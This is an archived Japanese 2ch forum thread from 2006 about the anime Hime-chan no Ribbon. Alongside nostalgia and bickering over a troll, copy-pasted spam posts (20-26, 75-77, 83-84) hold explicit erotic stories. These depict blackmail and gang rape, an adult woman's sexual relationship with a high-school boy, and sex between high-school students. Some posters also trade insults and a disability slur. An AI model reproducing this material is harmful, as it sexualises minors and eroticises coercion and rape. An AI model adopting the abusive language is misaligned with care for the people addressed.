5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

姫ちゃんのリボン

1 :名無しさん@お腹いっぱい。:2006/10/25(水) 12:34:47 ID:???0
荒らしによる流浪の果てに板分割でこの地に漂着、そんなときには笑顔のおまじない

いけいけゴーゴージャーンプ!

前スレ
http://anime.2ch.net/test/read.cgi/ranime/1155146692

2 :名無しさん@お腹いっぱい。:2006/10/25(水) 14:13:53 ID:kfQN9gRV0
元気な 君が好き♪
2ゲット

3 :名無しさん@お腹いっぱい。:2006/10/25(水) 22:00:13 ID:???0
>>1-2


4 :ポサダス ◆LnBDZOzVXc :2006/10/25(水) 22:39:30 ID:???0
記念真紀子

5 :名無しさん@お腹いっぱい。:2006/10/25(水) 23:37:20 ID:???0
ひかるタンがだいすきです

6 :名無しさん@お腹いっぱい。:2006/10/26(木) 02:13:05 ID:GTmxk9NiO
なつかすぃな…

7 :名無しさん@お腹いっぱい。:2006/10/26(木) 03:47:26 ID:???O
ここにヤツが来ない保証はあるのか…。

8 :名無しさん@お腹いっぱい。:2006/10/26(木) 03:50:04 ID:???0
>>7
ウェピースレで連続アク禁くらっていたから、同一人物だとしたら来ないんじゃない?
退会するとか書いていたようだし。

9 :名無しさん@お腹いっぱい。:2006/10/26(木) 14:08:04 ID:1XGk8ksb0
ひさしぶりにみたが、かわいいじゃないか

10 :名無しさん@お腹いっぱい。:2006/10/26(木) 22:15:59 ID:???0
>>9
ありがとう☆

11 :名無しさん@お腹いっぱい。:2006/10/26(木) 22:19:28 ID:???0
復活したようですね。姫ちゃんが一番です!

12 :名無しさん@お腹いっぱい。:2006/10/26(木) 22:40:39 ID:???0
姫ちゃんスレ復活か
夏の気持ち悪い人騒動からようやくだね。

13 :名無しさん@お腹いっぱい。:2006/10/27(金) 01:25:02 ID:???0
ネット池沼のことは、忘れて、またーりと行きましょう。

14 :名無しさん@お腹いっぱい。:2006/10/27(金) 05:23:59 ID:???0
でもほとぼり冷めたらまた、知らん顔しながら来てそうだなぁ…w

15 :名無しさん@お腹いっぱい。:2006/10/27(金) 05:52:07 ID:???0
まぁ来たら、どうせすぐまた認定エスパーが飛んでくるんじゃないの
ほっといてマッタリやってくダバ。

16 :名無しさん@お腹いっぱい。:2006/10/27(金) 06:33:53 ID:???0
ネタにもならないけど、検索してたら
しょこたんブログにも「姫ちゃんのリボン」の文字が。
まーこの人は知ってなきゃおかしいわな・・・

ttp://yaplog.jp/strawberry2/daily/200610/08/

17 :名無しさん@お腹いっぱい。:2006/10/27(金) 06:34:53 ID:???0
静かな雰囲気の、今のうちに書いておこう。
のんびりした良いアニメだった。主人公が一度命を落として変身解除とか
ハードな展開もあったけど。
センター試験で一橋大(会場だった)に行った時に訪れた国立市。
感慨深かったな。帰りに紀ノ国屋(スーパーの方)で高いパン買って
帰ったのも思い出。
でもあの駅舎、もうないんだよね…。

18 :その人:2006/10/27(金) 10:23:58 ID:???O
>>12-15
あのさ…一つ言っときたいんだが、あのコピペ厨と漏れは別人だから。

前スレでそのコピペ厨に話し掛けてたのが漏れ。
…漏れは技術的な知識は乏しいし携帯しかないから特定する方法はないけど、
前にあのやり方で荒らしを辞めさせた事が在るんだよ。
文章から本人だと信じるしかないけど。

まぁレス削除の条件知らなかったから、また一人不快にさせただけだったけど。
荒らしやってる椰子も人間だからさ…。


後『14歳の母一話の志田未来が姫ちゃんポかった』と言ったのも漏れ。
姫にしちゃ声は低めだけどw

19 :名無しさん@お腹いっぱい。:2006/10/27(金) 15:09:33 ID:???0
さっそく荒らしが来てるのか・・・いい加減にしてくれよorz


20 :名無しさん@お腹いっぱい。:2006/10/27(金) 19:44:21 ID:???0
はじめて投稿します。
31歳の専業主婦です。

私には変な癖があって、
一年前に結婚した後も自分の恥かしい姿を他人に晒す行為を
止めることができないでいました。

若い頃に年上の男性とお付き合いした時に教え込まれた
「露出」というスリル溢れる快感を忘れることができなかったのです。

私の身体を覗き見て興奮する男性の姿が、
私を大きな優越感に導いてくれるのです。

そして結婚後も一人で家にいる時に全裸になり、
窓のカーテンを開けたままでベッドの上でオナニーするのが
日課になっていました。

夫とのセックスよりも、バイブなどを使いながら
レイプ・輪姦されることを想像しながらオナニーをする方が興奮しますし、
イク時の絶頂感が大きいのです。

寝室は一階なので、家の裏に回って庭に面した窓から覗くと
室内は丸見えです。

最初は、誰かに気付いて欲しいと思いながら日中にしていましたが・・・
半年前の夏になると、夜にもするようになって夫の帰りが遅い時に、
部屋の電気を点けたままでオナニーをしていました。

誰かに見られてるかも知れない・・・という、
もの凄いスリルと興奮を覚えて激しい快感を覚えるのです。

そして、9月になると一通の封書が届きました。
それには、明らかに私と判る写真が同封されていました。
差出人は書かれてませんでした。

写真が同封された手紙には、卑猥な事がたくさん書かれていて、
読んでて顔が紅くなるくらいでした。

私は、覗いていた人に興味を持って
以前よりも大胆なオナニーにふけったのです。


21 :名無しさん@お腹いっぱい。:2006/10/27(金) 19:45:08 ID:???0
窓に向けて両脚を大きく広げ、指やバイブを挿入して
激しいオナニーを続けました。

しばらくして、また手紙が郵便ポストに入っていました。
内容は、私とエッチしたい・・といったことで写真も一緒でした。

誰かしら?と思っていた、その夜に偶然!
窓の外で覗いていた男と眼が合ってしまったのです

相手は隣家の高校生(S)でした。彼が逃げ帰った後で、
心臓がドキドキしながらも(可愛い子ね・・彼を誘惑しようかな・・)と
決めてチャンスを待ち、その週の土曜日の午後に、
覗きに来たS君を手招きして部屋に呼びました。

激しいセックスでした。フェラチオで一回、
生挿入で3回もS君は射精し、私も大きな快感を味わいました。

それからは、週に一度は隣り近所の目を盗んで
セックスをするようになったのです。
私は、充分に満足していました。

ところが、ある日、突然!S君の父親(46歳)が訪ねてきたのです。
S君の部屋から私の恥かしい写真がたくさん出てきたと言うのです。
そして私の露出行為やS君との関係も知っていると・・・・。

夫や隣り近所に写真をバラまくと脅かされて、
身体を求めてきました。

結局、抵抗できない私は彼に居間で全裸にされ、
2時間以上もいろんな体位で弄ばれ、二度も中に射精されました。

現在はS君との関係はなくなり、
S君の父親と彼の友人達に調教される毎日を送っています。

私にとって・・・・良かったのか?悪かったのか?
まだ、結論を出すことは出来ないでいますが、
度が過ぎた露出癖のために少なくとも月に2回は、
めくるめくような複数の中年男性とのセックスに溺れています。


22 :名無しさん@お腹いっぱい。:2006/10/27(金) 19:46:11 ID:???0
おとといの夜、
夫に嘘をついてS君の父親たちに連れられて
成人映画上映館に行きました。

男3人と私の4人です。
先にトイレに入れられてコート以外の着衣を全部脱がされました。
一人がバッグに全部しまい込んで、私はコートの下は全裸です。

館内に入ると3人は座らずに私を取り囲む様にして、
最後尾の手すりに立って映画を見ていました。

スクリーンでは人妻がヤクザ風の男に詰め寄られ、
犯されていくシーンが映し出されていました。

3人はコートの中に手を入れて、私の全身を弄び始めました。
立ったまま脚を大きく開かされた私の下半身や性器は執拗に愛撫され、
濡れ濡れの膣は男達の指を浅く深くと受け入れて
頭の中が真っ白になってしまいました。

私は目を固く閉じたまま必死で悶え声を出さない様に
我慢していましたが、少し時間が経つと、
とうとう声を出してしまったのです。

他のお客さんは2・3人しかいなかったのですが
気付いたかどうかは知りません。



23 :名無しさん@お腹いっぱい。:2006/10/27(金) 19:46:59 ID:???0
でも、3人の男達は、大胆にもコートを脱がすと
私をバックから犯したのです。

いかがわしい映画館で全裸にされて輪姦されたのです。
顔がカァーッと熱くなって何も分らなくなってしまいました。

犯されて感じ始めている私に突然!S君の父親が言いました。
「千春、見られてるぜ」って。ハッとして眼を開けると
見知らぬ男が真正面から私が輪姦されてるところを見てたのです。

キャァーと叫んだのは覚えていますが、
そこから意識が薄くなり・・

ハッキリ意識が戻った時には、
ラブホテルのベッドで3人に抱かれていました。
その夜の3人のセックスは、まるでレイプのような激しいものでした。
私も狂ったように泣き悶えて・・・

3人が満足して私が家に帰されたのは、11時を過ぎていました。

幸い、寝酒を飲んで酔っていた夫は、
私を求めてこなかったので気付かれることはありませんでしたが、
今こうして書き込みしてると・・鮮明に思い出して・・・。

また、連れられていくのかしら?と期待してしまいます。


24 :名無しさん@お腹いっぱい。:2006/10/27(金) 19:47:45 ID:???0
今日、お昼の1時過ぎに呼び出されて
いつもの3人とワンボックスカーでドライブに行きました。

当然、目的は変態的なセックスです。
私は後ろや側面にフィルムを貼った車の中で全裸にされ、
郊外をドライブしながら座席に座ったままで輪姦されました。

ズボンを脱いだ男の上に跨った格好で真下から犯されるのです。
背後から乳房や、乳首を愛撫されながら深〃と貫かれるのです。

走っている車の振動で、自分からお尻を動かさなくても・・・
激しい上下運動が下半身を揺さぶるんです。始めての体験でした。

運転を交代しながら3人は何度も繰り返し私を犯し、
中に射精しました。私の安全日を彼等は知っていますから・・・・・。

車内には、精液の臭いが充満して、
むせ返るようなイヤらしい雰囲気でした。

車のシートも私の下半身も膣から溢れ出した精液で・・
ヌルヌルになって、勢い余って膣から外れたペニスが
違う所を突っついて思わず「痛い!」って叫んだりもしました。

3時間近くも車内で輪姦されて・・・クタクタです。

3人は、役割を交代しながら色んなポーズで私を犯しながら
写真を撮りました。
お金を儲けるために・・・投稿雑誌に売るとか言ってました。

水曜日には、また映画館に行くと言っています。
水曜日は夫が出張で留守なんです。
きっと、朝まで一晩中・・・弄ばれると思います。

昨日、夕方過ぎにS君の父親が家にきました。
そして、「裸になれ」と言ったんです。

寝室で裸になった私を、彼は、いきなり犯しました。
生で挿入して、お臍の上に射精しました。
それから「今日は何も着るな」と命令して、
ハーフコートとヒールだけの私を連れてコンビニに行くと
二人が待ってました。



25 :名無しさん@お腹いっぱい。:2006/10/27(金) 19:48:31 ID:???0
そのまま、4人で先日の映画館に直行です。
前回と違いました。私はハーフコートの下は、いきなりの全裸なのです。
寒くても我慢してましたが、3人は平気でコートのファスナーを下げ、
身体を愛撫し始めました。

鳥肌を立ててる私の身体を弄びながら、
3人は「千春、感じてるのか?乳首がおっ立ってるぜ」とか
言ってました・・・私は寒かっただけなのに。

でも、割れ目やクリトリス、乳首を弄られるうちに感じてきて・・
思わず声を出していました。

男たちがオチンチンを出して私の両手に握らせます。
固く勃起しているオチンチンの先はネバネバしていました。

「よ〜し、もう、いいぞ千春」とS君の父親が言うと、
コートを腰の上に捲り上げ、後ろから挿入してきたんです。
3人に愛撫されながら、
スクリーンに映し出されるセックスシーンを見ていた私は濡れていました。
あっと!いう間に性器の奥まで受け入れて・・・
ああっ!と、声を出していました。

後は・・・眼を固く閉じたまま、
3人にバックから順番に輪姦されて悶えて・・狂っていました。

画面で数人の学生と乱交する人妻の姿と・・
輪姦されてる自分の姿を重なり合わせて、
私はアブノーマルなセックスの快楽に溺れてしまいました。

立ったままで全裸同然の身体を3人に輪姦されてイキまくっている私は、
他の観客から、どんな風に見えてるのかは知りませんが、
かなり刺激的だったと思います。

3人は生で入れて、射精する時は外に出していました。
私の、太腿や膝の裏を伝って、ヒールの中にまで
冷たくなった精液が入ってきました。

3人は、それぞれ2度ずつ射精すると私を座席に座らせました。
頭がクラクラしながら・・私は(何・・するのかしら?)と
ボンヤリと思っていました。


26 :名無しさん@お腹いっぱい。:2006/10/27(金) 19:50:10 ID:???0
3人の内の一人が、前の席に座っている他のお客さんに話しかけました。
すると、2人のお客さんが立ち上がって、私たちの所にきて、
私の両隣りに座ったのです。

何をされるのか?直ぐに判りました。私を犯させようとしてる・・・と、
思いました。
でも、違いました。挿入なしで、わたしの身体を弄ばせたのです。
コートだけの全裸同然の私の身体を二人は楽しみました。

交代しながら、クリトリスや割れ目、乳房や乳首を執拗に舐め、
吸い、噛み、時には・・輪姦されたばかりの膣の中に指を入れて・・・

最後は、ズボンからオチンチンを出して、乳房に射精しました。
S君の父親が「千春、サービスしてやるんだよ」と言って、
無理矢理にフェラを強要しました。

しかたなくフェラすると、また勃起してきます。
すると3人は「もっと金があるか?」みたいな事を言うと、
二人は座席に戻ったのです。

「続きは、千春の家でやろう」とS君の父親が言って、
家に戻りました。それからは、一晩中・・輪姦されっ放しでした。

3人に様々な体位で犯され・・・一人が膣を犯してるときにも、
同時に口にも咥えさせられたり・・
犯されながらアヌスにも指を入れられて、悶え狂いました。

膣とアヌスを同時に弄られることが、あんなに物凄い快感を与えるとは・・思ってもいませんでした。

3人は今朝の5時頃に帰りましたが、私は、もう・・・駄目です。
S君の父親から逃げようとは思いません。

夫では味わえない快楽。
止むことなく襲ってくるエクスタシーの嵐を忘れる事が出来ません。
3人や、見知らぬ男に弄ばれる快感に・・のめり込んでしまいました。



27 :名無しさん@お腹いっぱい。:2006/10/27(金) 20:44:14 ID:???0
死に晒せ>>18


28 :名無しさん@お腹いっぱい。:2006/10/27(金) 21:02:09 ID:???0
>>27
お前が死に晒せ

29 :その人:2006/10/27(金) 22:11:13 ID:???O
冗談だろ……。ι

ヤツの狙いはなんだ?
前々スレ見ても叩かれて始まったカンジじゃないし、
なんなのガチで??

おまいらは『気持ち悪い人のリベンジ』と思えば納得だろーが、
漏れは本人だ。違う事を知ってる。ガチでPCは持ってない。

全く意味がワカラン……。

30 :名無しさん@お腹いっぱい。:2006/10/27(金) 22:27:50 ID:???0
>>29
自演乙
君が一番きもいよwwwww

31 :名無しさん@お腹いっぱい。:2006/10/28(土) 05:06:49 ID:???0
>>29
ハイもうよくわかったから
「姫ちゃんのリボン」のスレッドに二度と来ないで下さい

32 :名無しさん@お腹いっぱい。:2006/10/28(土) 10:51:37 ID:???O
>>30-31
漏れがPC持ってたらあんな無駄なコトしないよ…。

漏れが今PC持ってたら『14歳の母』の一話の姫ちゃんな志田未来を
どっかから引っ張ってきてうPしたい…。
てかスレ建てるよ『気持ち悪いくらい姫ちゃん好きな椰子恋』みたいなの。

大体気持ち悪いと言われるくらい姫ちゃん好きな漏れがアレやってる間は姫話出来ないんだぞ?堪えれんよ。

そして何故ワザワザまだ携帯からカキコすんだよ?
自演だとしたら目的は何だと?

33 :名無しさん@お腹いっぱい。:2006/10/28(土) 13:01:06 ID:???O
昨日初めてツタヤで借りてきて見たんですけど、アニメにすると一話一話がかなり長く感じますね。

34 :名無しさん@お腹いっぱい。:2006/10/28(土) 13:27:23 ID:???0
>>32
>自演だとしたら目的は何だと?

構ってほしいのと構ってもらえない憂さ晴らし。

あんたが荒しで無いとしても十分ウザがられてるんだから特定されるような
言動を控えて空気のようなカキコに徹するべきだと思うが
匿名なんだし、荒しでないことを証明するより、存在自体を隠すべし

35 :名無しさん@お腹いっぱい。:2006/10/28(土) 15:11:17 ID:???0
>>34
隠せるようなキモさじゃないでしょ。
今でも空気荒らしてるし、また気持ち悪くなりだして荒れられちゃかなわん。

36 :名無しさん@お腹いっぱい。:2006/10/28(土) 16:01:12 ID:???0
>>32
ていうかあの、何回か消えるって宣言してたけど、何だったのかな…

37 :静岡賢人:2006/10/28(土) 16:33:39 ID:???0
私から提案。コピペ荒しが気持ち悪い人じゃないこと前提で

>気持ち悪い人

定期的にコピペレスの削除依頼を出してくれ。コピペが消えればあんたのレスが残っても差し引きでプラスだ。
荒し疑惑も消えるし一石二鳥。
それにもう俺はやりたくない。


38 :名無しさん@お腹いっぱい。:2006/10/28(土) 17:46:55 ID:???0
>>31
やなこった

39 :名無しさん@お腹いっぱい。:2006/10/28(土) 17:47:41 ID:???0
>>32
そんなこと君にいう必要は無い

40 :名無しさん@お腹いっぱい。:2006/10/28(土) 17:48:29 ID:???0
>>33
お前の人生は2000年ぐらいあるんだろうな。

41 :名無しさん@お腹いっぱい。:2006/10/28(土) 17:49:20 ID:???0
>>34
そんなにうざいんだったら荒らし報告に出してみれば?
ログ堀り→規制になるからさ。

42 :名無しさん@お腹いっぱい。:2006/10/28(土) 17:50:18 ID:???0
>>35
日本語で話してください
意味がわかりません

43 :名無しさん@お腹いっぱい。:2006/10/28(土) 17:51:05 ID:???0
>>36
第三者のトロイの木馬発言

44 :名無しさん@お腹いっぱい。:2006/10/28(土) 17:51:52 ID:???0
>>37
ホスト晒してまでなんで仕事しないといけないんだ。
お前がやれ、糞。

45 :名無しさん@お腹いっぱい。:2006/10/28(土) 18:03:24 ID:???0
ホストさらすのって何か不都合あるの?

46 :名無しさん@お腹いっぱい。:2006/10/28(土) 18:14:28 ID:???0
>>45
そんな質問するぐらいならお前がやれ。

47 :名無しさん@お腹いっぱい。:2006/10/28(土) 18:24:22 ID:???0
おまえ、名無しにしてもバレバレだからトリップ付けろよ。NGワードにすればこっちでスルーするし

48 :名無しさん@お腹いっぱい。:2006/10/28(土) 19:06:05 ID:???0
>>47
お前に命令されるいわれはない

49 :熱血姫バカ:2006/10/28(土) 19:39:44 ID:???O
↑ハンネこれにします

>>37
携帯でも出来んの?
だったら毎日でもやるよ。
やり方教えてください。

50 :熱血姫ちゃんバカ:2006/10/28(土) 19:46:24 ID:???O
ゴメソ。微変更www


てか…
もしかして漏れ以外に“気持ち悪い人自覚”在る椰子いんのか?(*゚艸゚)
なんかそんな流れが…。

51 :名無しさん@お腹いっぱい。:2006/10/28(土) 20:10:03 ID:???0
>>49-50
お前はバカというより池沼のほうがあっているぞ。
HNを変えろ。

52 :熱血姫ちゃん池沼:2006/10/28(土) 20:10:59 ID:???0
>>51
これでいいのか?


53 :名無しさん@お腹いっぱい。:2006/10/28(土) 20:48:59 ID:???0
>>49-50
もう消えてくれよ。いるだけで迷惑。

54 :熱血姫ちゃんバカ:2006/10/28(土) 21:13:57 ID:LKji2dlxO
>>53
悪い。一度ageるからNG登録してください。

55 :名無しさん@お腹いっぱい。:2006/10/28(土) 21:22:19 ID:???0
>>53
お前が消えてくれ。迷惑だから

56 :名無しさん@お腹いっぱい。:2006/10/28(土) 21:23:06 ID:???0
>>54
ageるなカス

57 :熱血姫ちゃんバカ:2006/10/28(土) 22:09:17 ID:???O
>>56
悪い。でもココ何故かageないとID出ないからさ…。(´・ω・`)

58 :名無しさん@お腹いっぱい。:2006/10/28(土) 22:33:13 ID:???0
SMAPの「元気な君が好き〜」って歌が主題歌だっけ?

59 :名無しさん@お腹いっぱい。:2006/10/28(土) 22:41:07 ID:???0
>>57
本当に池沼だなwwwww

60 :名無しさん@お腹いっぱい。:2006/10/28(土) 22:42:12 ID:???0
>>58
それがどうした?

61 :熱血姫ちゃんバカ:2006/10/28(土) 22:46:20 ID:???O
>>58
そうそう。
『笑顔のゲンキ』な。
姫ちゃんは唯一のOPED全てSMAPという今となっては奇跡のアニメw

62 :名無しさん@お腹いっぱい。:2006/10/28(土) 22:46:47 ID:???0
>>61
だからどうした?

63 :トリップの付け方 ◆hEpdoZ.tHU :2006/10/28(土) 23:43:35 ID:???0
ハンドルの末尾に"#hoge"をつけます。
たとえば名前欄に "ハンドル#pass" と入力すると "ハンドル ◆XksB4AwhxU"となります。

64 :名無しさん@お腹いっぱい。:2006/10/29(日) 05:23:58 ID:???0
>>63
もっと簡単な方法。
名前に山崎渉といれて書き込む。

65 :名無しさん@お腹いっぱい。:2006/10/29(日) 10:43:12 ID:???0
昨日、不細工な男と話したんです。ブ男。
そしたらなんかめちゃくちゃ好きな娘ができたらしいんです。
で、よく見たらなんか小ぎれいにしちゃって、見たこと無い服着てるんです。
もうね、アホかと。馬鹿かと。
あんたね、好きな娘ができたぐらいで着なれない服着てるんじゃねーよ、ブ男が。
そのセンスだよ、センス。
なんか帽子かぶってるし。ストリート系だってか。おめでてーな。
よーし俺イケてるじゃん、とか言ってるの。もう見てらんない。
あんたね、普段のがなんぼかマシだから着替えて来いと。
ブ男ってのはな、ダサい服着てるべきなんだよ。
すれ違った女100人が100人とも「今日のダサい奴」にチェックしてもおかしくない、
俺は女に縁がありません、そんな雰囲気がいいんじゃねーか。
ブーンだのメンズノンノだのは、すっこんでろ。
で、やっと着替えたかと思ったら、どうやってコクるかな、とか言ってるんです。


66 :名無しさん@お腹いっぱい。:2006/10/29(日) 10:44:00 ID:???0
そこでまたぶち切れですよ。
あのな、あんたはわかってねーんだよ。ブ男が。
得意げな顔して何が、コクるかな、だ。
あんたは何度失敗すれば判るのかと問いたい。問い詰めたい。小1時間問い詰めたい。
あんた、コクりたいって言いたいだけちゃうんかと。
隣に住んで15年のアタシから言わせてもらえば今回、あんたはやっぱりコクれない、
自爆、これだね。
ベッドの上で叫んでのたうちまわる。これがあんたのコクり方
自爆ってのは相手に言えない。そん代わり相手に避けられる可能性少なめ。これ。
で、相手に彼が出来てあきらめる。これ最強。
しかしこれを続けてるとホモの噂が立つという危険も伴う、諸刃の剣。
素人にはお薦め出来ない。
まああんたみたいなブ男は、早いところアタシの気持ちに気付けってこった。


67 :名無しさん@お腹いっぱい。:2006/10/29(日) 10:44:48 ID:???0
昨日、ブスな女と話したんです。ブス女。
そしたらなんかめちゃくちゃ好きな人ができたらしいんです。
で、よく見たらなんかほんのり化粧してて、アイラインとか引いてるんです。
もうね、アホかと。馬鹿かと。
お前な、好きな人ができたぐらいで普段してない化粧なんてしてんじゃねーよ、ブスが。
つくりの問題だよ、つくりの。
なんかリップも引いちゃってるし。女の子らしくメイクってか。おめでてーな。
ちょっとは見られる顔になったでしょ、とか言ってるの。もう見てらんない。
お前な、鏡やるからその化粧落とせと。
ブス女ってのはな、すっぴんでいるべきなんだよ。
席替えで隣になった男子からボロクソ言われてもおかしくない、
私は女を捨ててます、そんな雰囲気がいいんじゃねーか。ピエヌだのメイベリンだのは、すっこんでろ。


68 :名無しさん@お腹いっぱい。:2006/10/29(日) 10:45:40 ID:???0
で、やっと話がそれたかと思ったら、はぁ〜恋って切ないね、とか言ってるんです。
そこでまたぶち切れですよ。
あのな、お前にはそんなもん必要ねーんだよ。ブスが。
得意げな顔して何が、恋は切ないね、だ。
お前は本当に恋をしているのかと問いたい。問い詰めたい。小1時間問い詰めたい。
お前、恋してるって言いたいだけちゃうんかと。
情報通の俺から言わせてもらえば今、お前のアノ人には、
カワイイ彼女がいるんだよ。残念だったな。


69 :名無しさん@お腹いっぱい。:2006/10/29(日) 10:46:38 ID:???0
気づかずラブレターでギョク砕。これがブスのコクり方。
ラブレターってのは顔を合わせることがない。そん代わりショック少な目。これ。
で、返事がいつまでも来ないで自動あぼーん。これ最強。
しかしこれをやるとクラス全員にばれる危険も伴う、諸刃の剣。
素人にはお薦め出来ない。
まあお前みたいなブス女は、早いところオレの気持ちに気付けってこった。



70 :熱血姫ちゃんバカ ◆MvRbZL6NeQ :2006/10/29(日) 16:18:29 ID:???O
これでなったかな?酉。
>>63氏、有難う。


>>37
で、あの…レス削除のやり方は……。

71 :名無しさん@お腹いっぱい。:2006/10/29(日) 16:51:03 ID:???0
あとは君の脳内の友達にも教えてあげること

72 :名無しさん@お腹いっぱい。:2006/10/29(日) 18:14:02 ID:???0
>>70
お前、救いようの無いバカだな

73 :名無しさん@お腹いっぱい。:2006/10/29(日) 18:14:53 ID:???0
>>71
同意

74 :名無しさん@お腹いっぱい。:2006/10/29(日) 18:20:30 ID:???0
>>71
同意。

>>72
同意。

75 :名無しさん@お腹いっぱい。:2006/10/29(日) 23:02:34 ID:???0
俺の高校時代のこと。
俺の名前はたつや。某県立高校に通っていた。その学校は俺たちが入るまではあまり吹奏楽が盛んではなかったが、俺たちの代30人ほどが入ってやっと50人のバンドになったほどだ。俺の中学はなかなかの名門校で高校でもトップを吹いていた。
夏の大会が終わってから俺は燃え尽きたようにクラブに顔を出さなくなった。はじめは学校生活を楽しんでいたけど、学園祭の日喧嘩騒動で大量の人間が謹慎処分になった。俺はその事件の起爆剤みたいなものだ。初の学園祭が変な思い出となってしまった。
次の日の朝、正式に処分言い渡しがあり、そのまま強制帰宅であった。帰りに学校近くのコンビニで一服していると、ケータイがなった。画面にはクラブのタメの女の子の名前(菜々)が表示されていた。
「もしもし?」 「・・・。」 返答はない。しかしかすかにすすり泣く声がこっちにも聞こえてくる。おれはそのことには触れずもう一度聞きなおした。
「もしもし?どうした?」 「なにしてるんよ・・・!みんなどれだけしんぱいしてるんか分かってよ。たつやがなんかあったんかと思ってクラブに来てともゆえやんかったのに、急に謹慎とか・・。」
おれは何も言えなかった。しばらく黙りあってると、「今どこいてるん・・・」 と聞かれ近くのコンビニであることを伝え電話を切った。

電話を切って5分もしないうちに制服姿の女の子の姿が見えた。 目の前に座る彼女の顔を見ると目が真っ赤だった。やっぱり泣いてたのかな。
今までにあったことを話してると菜々は理解してくれ真剣に話も聞いてくれていた。そんな延々とした話をしていると時刻は昼前になっていた。学生の姿が見え出す。
「今先生にバレてもあれやし、とりあえず帰るわ。」と言い帰る支度をすると、「まだ話したいことある。」と言われた。
けどばれると謹慎が伸びて退屈な時間が増えてしまうのがオチだ。それは困ると思い、「じゃあ家やったらかまへんよ。」そういい原付の後ろに乗せて家に向った。
家は本当は遠いんだが、高校を通うために親が一人暮らしのためマンションを借りてくれたのだ。
家に着くと、暖房をきかしてコーヒーを沸かして冷えた体をとりあえず温めた。


76 :名無しさん@お腹いっぱい。:2006/10/29(日) 23:03:32 ID:???0
一息ついてると部屋も暖まった。「で、話ってなに?」 
「うん・・。あたしね、中学校で吹奏楽やってるときはほんまに何にも考えてなくて、とりあえずゆわれたことやって流れに合わしてきてたん。
けど高校きてたつやみたいな子が吹奏楽でトランペット吹いてるの見て正直びっくりした。
意外ってのもあるけど、真剣に練習したりするたつやと、とりあえず顔出して参加してるあたしを比べてしまうと自分が情けなくなって。
けどたつやも周りのみんなとも半年クラブして、ほんまの吹奏楽の楽しさ教えてもらった気がする。
でもたつやいてなくなってまた分からなくなった。一回は辞めようとも思った。でも絶対たつやは帰ってくると思った。
だからもう一回真剣に吹奏楽がしたいと思う。そのためにたつやがあたしには必要。
今まではゆう自信なかったけど今なら言える自信ある。付き合って!」
言葉の終わりと同時に菜々が胸に飛び込んできた。菜々をそんな目で見たことはなかったけど、そういわれて嬉しかった。

「ありがとう。そんなこと思ってくれてるとは思えへんかった。じゃあ・・。」そういい俺は菜々の唇にキスをした。菜々の頬は赤かった。
その頬を見て笑うと、「こんなの初めてだから恥ずかしいの!」そういってまたキスをした。すると菜々の方から舌を絡めてきた。
菜々を抱いてベットに連れて行った。クラブに顔を出さなくなってから冷めていた心がだんだん暖まっていくのが分かる。
どちらともなく唇をふたたび重ねると俺は服に手を忍ばせ胸を触り始めた。菜々は声にならない声を出す。
「あ・・ん。き、きもちいいよ。」お互い感情がエスカレートして上半身はすでに服がなかった。お互い脱ぐ恥ずかしさなど忘れて。
胸をなめると「たつや、髪の毛がくすぐったいよ・・。ん・・」またキスをして唇をふさいだ。
スカートをめくり、あそこに手をやるとすでにビチョビチョだ。「菜々、すっげぇ濡れてる・・。」
パンツを下ろしてあそこに手を入れる。「あ、んあぁ・・!」左手と口で胸をいじり、右手はあそこをいじる。
菜々はもう壊れそうだった。「た、たつや・・。一つになりたい・・!」必死に出した声で俺に投げかけてきた。


77 :名無しさん@お腹いっぱい。:2006/10/29(日) 23:04:26 ID:???0
けどそんな菜々をまだ見ていたい俺はじらした。唇を胸からあそこへ・・。わざと菜々にいやらしい音を聞かせた。
「い、いゃあ・・!」もう菜々は失神寸前の様子・・。それを見て俺はズボンを脱ぎ、菜々のあそこに入れようとした。けど本当にいきそうな菜々を見て、菜々の横に並んだ。
「菜々、おまえに会えてよかった」 「あたしも。」
そう言ってキスすると、俺は菜々のあそこに挿入した。「ん、あん・・。」
菜々は痛がる表情をしなかった。俺はそれに安心して腰を振った。俺の腰に合わして菜々の吐息と声が漏れる・・。
互いに欲求と感度がピークに達すると、「ビュッビュ・・!!」
お互いそのまま寝てしまった。
それから交際を始め、謹慎中は菜々がうちで過ごした。学校での話、クラブのこと、色々と話してくれる菜々が愛おしかった。
そして俺は謹慎を解除してもらい、クラブにも復帰さしてもらい、平穏な日々に帰っていきました。

チャンチャン♪


78 :名無しさん@お腹いっぱい。:2006/10/30(月) 21:55:28 ID:???0
はじめてここ見たけど姫ちゃんのスレだよな。↑

79 :名無しさん@お腹いっぱい。:2006/10/30(月) 22:13:16 ID:???0
また規制されたみたいだね!
懲りない奴だ・・・・

80 :名無しさん@お腹いっぱい。:2006/10/31(火) 05:37:53 ID:???0
規制が恣意的だから、すぐに解除されたを。

81 :名無しさん@お腹いっぱい。:2006/11/01(水) 05:12:21 ID:???0
>>78
姫はじめのスレッドらしいぞ

82 :名無しさん@お腹いっぱい。:2006/11/01(水) 07:39:05 ID:???0
そうか。姫ちゃんキャラとエロ妄想を掛け合わせればいいのね。

83 :名無しさん@お腹いっぱい。:2006/11/01(水) 20:36:40 ID:???0
今日は彼と久しぶりのデートをしてきました。
彼が去年の11月ごろから1人暮らしになったので、彼の部屋で
デートすることに♪

初めて乗るような路線を乗り継いで(笑)、彼の家のある駅へ到着。
着いたことを知らせるために電話をしたものの出ません(T_T)
多分寝てるんだろうなぁと駅のところの本屋さんで時間つぶし(爆)

もう起きてるだろうなという時間に再び電話。
やっと彼が出てくれたので、もう着いてることを知らせるとバタバタと
慌てるような声w

「今すぐ行きます〜待っててください。」
「うん、待ってるね。」

彼が自転車で到着、2人でてくてくと歩きながら彼の部屋へ。
すごく寒いからねと聞いてはいたけど、部屋の中で息が白いのは一体...

自分の部屋だからなのか彼はまったりムード...攻めてくる気配すらありません(爆)
自分からキスをしてみました...


久しぶりのキスはなんだかとても懐かしくて、キスだけを何度も何度も
してたようなw

お風呂入ってないからというので、お風呂の準備をしつつ色々おしゃべり。
一緒には入れるなら一緒が良いなといって私も一緒にお風呂。
狭かったけど湯船で密着...気が付けばすっかり彼のペースw

逆上せちゃうから出ようよといって二人でお風呂から出て、
寒いねぇ〜といいながら裸のままロフトに上って(寝るスペースがロフトになってた)
布団に入ったものの寒くて、暖かくなるまでまったりのままw



84 :名無しさん@お腹いっぱい。:2006/11/01(水) 20:37:43 ID:???0
裸になってるのにまったりのままなのかなぁと少し淋しくなったので
